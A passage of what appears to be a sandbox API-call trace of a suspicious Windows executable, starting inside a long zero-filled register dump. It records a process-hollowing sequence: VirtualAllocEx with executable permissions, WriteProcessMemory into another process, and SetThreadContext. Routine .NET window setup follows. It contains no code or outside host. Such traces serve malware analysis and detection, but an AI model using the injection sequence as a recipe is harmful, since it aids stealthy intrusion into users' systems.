[57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0260.388] ReadProcessMemory (in: hProcess=0x2c0, lpBaseAddress=0x7efde008, lpBuffer=0x0, nSize=0x4, lpNumberOfBytesRead=0x43efbc | out: lpBuffer=0x0, lpNumberOfBytesRead=0x43efbc) returned 0 [0260.388] VirtualAllocEx (hProcess=0x2c0, lpAddress=0x400000, dwSize=0x29000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0260.390] WriteProcessMemory (in: hProcess=0x2c0, lpBaseAddress=0x400000, lpBuffer=0x3452360*, nSize=0x200, lpNumberOfBytesWritten=0x43efbc | out: lpBuffer=0x3452360*, lpNumberOfBytesWritten=0x43efbc*=0x200) returned 1 [0260.397] WriteProcessMemory (in: hProcess=0x2c0, lpBaseAddress=0x401000, lpBuffer=0x347b180*, nSize=0x27c00, lpNumberOfBytesWritten=0x43efbc | out: lpBuffer=0x347b180*, lpNumberOfBytesWritten=0x43efbc*=0x27c00) returned 1 [0260.427] WriteProcessMemory (in: hProcess=0x2c0, lpBaseAddress=0x7efde008, lpBuffer=0x24f5944*, nSize=0x4, lpNumberOfBytesWritten=0x43efbc | out: lpBuffer=0x24f5944*, lpNumberOfBytesWritten=0x43efbc*=0x4) returned 1 [0262.440] SetThreadContext (hThread=0x2bc, lpContext=0x24f566c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x41d460, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0262.556] GetCurrentActCtx (in: lphActCtx=0x43efbc | out: lphActCtx=0x43efbc*=0x0) returned 1 [0262.556] ActivateActCtx (in: hActCtx=0x7cf47c, lpCookie=0x43efcc | out: hActCtx=0x7cf47c, lpCookie=0x43efcc) returned 1 [0262.556] GetCurrentActCtx (in: lphActCtx=0x43eddc | out: lphActCtx=0x43eddc*=0x7cf47c) returned 1 [0262.613] GetModuleHandleW (lpModuleName=0x0) returned 0xc30000 [0262.613] CreateWindowExW (dwExStyle=0x10000, lpClassName="WindowsForms10.Window.8.app.0.34f5582_r14_ad1", lpWindowName=0x0, dwStyle=0x22010000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0xc30000, lpParam=0x0) returned 0x1013e [0262.659] SetWindowLongW (hWnd=0x1013e, nIndex=-4, dwNewLong=2005149149) returned 82250646 [0262.659] GetWindowLongW (hWnd=0x1013e, nIndex=-4) returned 2005149149 [0262.659] SetWindowLongW (hWnd=0x1013e, nIndex=-4, dwNewLong=82250766) returned 2005149149 [0262.659] GetWindowLongW (hWnd=0x1013e, nIndex=-4) returned 82250766 [0262.659] GetWindowLongW (hWnd=0x1013e, nIndex=-16) returned 650182656 [0262.659] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x81, wParam=0x0, lParam=0x43e864) returned 0x1 [0262.661] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x83, wParam=0x0, lParam=0x43e850) returned 0x0 [0262.690] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x1, wParam=0x0, lParam=0x43e864) returned 0x0 [0262.690] GetClientRect (in: hWnd=0x1013e, lpRect=0x43e59c | out: lpRect=0x43e59c) returned 1 [0262.690] GetWindowRect (in: hWnd=0x1013e, lpRect=0x43e59c | out: lpRect=0x43e59c) returned 1 [0262.690] GetWindowTextLengthW (hWnd=0x1013e) returned 0 [0262.690] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0262.690] GetSystemMetrics (nIndex=42) returned 0 [0262.691] GetWindowTextW (in: hWnd=0x1013e, lpString=0x43e414, nMaxCount=1 | out: lpString="") returned 0 [0262.691] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0xd, wParam=0x1, lParam=0x43e414) returned 0x0 [0262.691] GetProcessWindowStation () returned 0x60 [0262.692] GetUserObjectInformationA (in: hObj=0x60, nIndex=1, pvInfo=0x24f6494, nLength=0xc, lpnLengthNeeded=0x43e494 | out: pvInfo=0x24f6494, lpnLengthNeeded=0x43e494) returned 1 [0262.692] SetConsoleCtrlHandler (HandlerRoutine=0x4e70c36, Add=1) returned 1 [0262.693] GetModuleHandleW (lpModuleName=0x0) returned 0xc30000 [0262.693] GetModuleHandleW (lpModuleName=0x0) returned 0xc30000 [0262.695] GetClassInfoW (in: hInstance=0xc30000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.34f5582.0", lpWndClass=0x24f64f8 | out: lpWndClass=0x24f64f8) returned 0 [0262.695] CoTaskMemAlloc (cb=0x58) returned 0x7e1938 [0262.695] RegisterClassW (lpWndClass=0x43e3e4) returned 0xc108 [0262.695] CoTaskMemFree (pv=0x7e1938) [0262.696] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.34f5582.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.34f5582.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xc30000, lpParam=0x0) returned 0x10142 [0262.697] NtdllDefWindowProc_W () returned 0x1 [0262.697] NtdllDefWindowProc_W () returned 0x0 [0262.697] NtdllDefWindowProc_W () returned 0x0 [0262.697] NtdllDefWindowProc_W () returned 0x0 [0262.697] NtdllDefWindowProc_W () returned 0x0 [0262.801] GetStartupInfoW (in: lpStartupInfo=0x24f6894 | out: lpStartupInfo=0x24f6894*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0262.846] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x46, wParam=0x0, lParam=0x43e878) returned 0x0 [0262.846] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x83, wParam=0x1, lParam=0x43e850) returned 0x0 [0262.847] GetWindowPlacement (in: hWnd=0x1013e, lpwndpl=0x43e628 | out: lpwndpl=0x43e628) returned 1 [0262.847] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x47, wParam=0x0, lParam=0x43e878) returned 0x0 [0262.847] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x3, wParam=0x0, lParam=0x83008300) returned 0x0 [0262.847] GetClientRect (in: hWnd=0x1013e, lpRect=0x43e13c | out: lpRect=0x43e13c) returned 1 [0262.847] GetWindowRect (in: hWnd=0x1013e, lpRect=0x43e13c | out: lpRect=0x43e13c) returned 1 [0262.847] GetWindowTextLengthW (hWnd=0x1013e) returned 0 [0262.847] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0262.847] GetSystemMetrics (nIndex=42) returned 0 [0262.847] GetWindowTextW (in: hWnd=0x1013e, lpString=0x43dfb4, nMaxCount=1 | out: lpString="") returned 0 [0262.847] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0xd, wParam=0x1, lParam=0x43dfb4) returned 0x0 [0262.848] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x5, wParam=0x1, lParam=0x0) returned 0x0 [0262.892] GetClientRect (in: hWnd=0x1013e, lpRect=0x43e5d8 | out: lpRect=0x43e5d8) returned 1 [0262.892] GetWindowRect (in: hWnd=0x1013e, lpRect=0x43e5d8 | out: lpRect=0x43e5d8) returned 1 [0262.893] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0xd, wParam=0x104, lParam=0x496c5e0) returned 0x0 [0262.949] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x83, wParam=0x1, lParam=0x43e45c) returned 0x0 [0262.950] GetParent (hWnd=0x1013e) returned 0x0 [0262.992] GetStockObject (i=5) returned 0x1900015 [0262.993] GetModuleHandleW (lpModuleName=0x0) returned 0xc30000 [0262.993] CoTaskMemAlloc (cb=0x5c) returned 0x7c3a98 [0262.993] RegisterClassW (lpWndClass=0x43ecac) returned 0xc109 [0262.994] CoTaskMemFree (pv=0x7c3a98) [0262.994] GetModuleHandleW (lpModuleName=0x0) returned 0xc30000 [0262.994] CreateWindowExW (dwExStyle=0x80, lpClassName="WindowsForms10.Window.0.app.0.34f5582_r14_ad1", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xc30000, lpParam=0x0) returned 0x10144 [0262.994] SetWindowLongW (hWnd=0x10144, nIndex=-4, dwNewLong=2005149149) returned 82250886 [0262.994] GetWindowLongW (hWnd=0x10144, nIndex=-4) returned 2005149149 [0262.994] SetWindowLongW (hWnd=0x10144, nIndex=-4, dwNewLong=82250926) returned 2005149149 [0262.994] GetWindowLongW (hWnd=0x10144, nIndex=-4) returned 82250926 [0262.994] GetWindowLongW (hWnd=0x10144, nIndex=-16) returned 79691776 [0263.033] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x10144, Msg=0x24, wParam=0x0, lParam=0x43e898) returned 0x0 [0263.033] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x10144, Msg=0x81, wParam=0x0, lParam=0x43e88c) returned 0x1 [0263.033] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x10144, Msg=0x83, wParam=0x0, lParam=0x43e878) returned 0x0 [0263.033] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x10144, Msg=0x1, wParam=0x0, lParam=0x43e88c) returned 0x0 [0263.034] SetWindowLongW (hWnd=0x1013e, nIndex=-8, dwNewLong=65860) returned 0 [0263.370] GetSystemMetrics (nIndex=11) returned 32 [0263.370] GetSystemMetrics (nIndex=12) returned 32 [0263.371] GetDC (hWnd=0x0) returned 0x1401007f [0263.456] GetDeviceCaps (hdc=0x1401007f, index=12) returned 32 [0263.456] GetDeviceCaps (hdc=0x1401007f, index=14) returned 1 [0263.456] ReleaseDC (hWnd=0x0, hDC=0x1401007f) returned 1 [0263.458] CreateIconFromResourceEx (presbits=0x24f9b54, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x4006f [0263.459] GetSystemMetrics (nIndex=49) returned 16 [0263.459] GetSystemMetrics (nIndex=50) returned 16 [0263.460] CreateIconFromResourceEx (presbits=0x24fac38, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x30075 [0263.460] SendMessageW (hWnd=0x1013e, Msg=0x80, wParam=0x0, lParam=0x30075) returned 0x0 [0263.460] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x80, wParam=0x0, lParam=0x30075) returned 0x0 [0263.461] SendMessageW (hWnd=0x1013e, Msg=0x80, wParam=0x1, lParam=0x4006f) returned 0x0 [0263.461] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0x80, wParam=0x1, lParam=0x4006f) returned 0x0 [0263.461] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0xd, wParam=0x104, lParam=0x496c5e0) returned 0x0 [0263.461] CallWindowProcW (lpPrevWndFunc=0x778425dd, hWnd=0x1013e, Msg=0xd, wParam=0x104, lParam=0x496c5e0) returned 0x0 [0263.461] GetSystemMenu (hWnd=0x1013e, bRevert=0) returned 0x0 [0263.461] GetWindowPlacement (in: hWnd=0x1013e, lpwndpl=0x43edec | out: lpwndpl=0x43edec) returned 1 [0263.462] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf020, uEnable=0x1) returned 1 [0263.462] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf030, uEnable=0x0) returned 1 [0263.462] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x0) returned 1 [0263.462] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf120, uEnable=0x0) returned 1 [0263.462] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf000, uEnable=0x1) returned 1 [0263.462] 